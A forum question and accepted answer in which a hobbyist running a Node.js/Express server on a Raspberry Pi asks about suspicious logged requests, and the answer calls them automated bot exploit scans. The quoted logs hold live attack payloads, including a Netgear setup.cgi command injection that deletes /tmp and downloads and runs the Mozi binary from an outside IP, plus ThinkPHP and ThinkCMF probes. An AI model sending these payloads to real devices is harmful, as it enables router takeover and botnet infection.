# Started my own node.js web server project - what are these GET requests?

Tags: node.js, express, get, webserver

I recently set up a home web server to run my node.js & express web app (using a Raspberry Pi, basically to figure out how to do it).

Not long (hours) after activating it on my domain, I logged the following GET requests:

```
0|app.js   | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://218.77.224.248:55400/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 404 23.779 ms - 922
0|app.js   | GET /solr/admin/info/system?wt=json 404 25.780 ms - 922
0|app.js   | GET /?XDEBUG_SESSION_START=phpstorm 200 24.322 ms - 170
0|app.js   | GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 200 21.867 ms - 170
0|app.js   | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP 404 25.449 ms - 922
```

Was my server under attack?

If so how did the attacker target me?

How do I prevent attacks and have good security?

Or am I reading this all wrong?

Thanks

Answer (score 1, accepted):

You are getting attacked... But you're fine, since those attacks don't affect Node.JS. https://forum.codeigniter.com/thread-75932.html

Those attacks were probably just automated ones (since they were just throwing random exploits at your webserver), and the attacker was probably a bot, programmed to throw common exploits at webservers.

About having good security though... That is a hard thing to get right. I suggest you start [here](https://expressjs.com/en/advanced/best-practice-security.html) at the Express docs, and then just go online and see what results come up.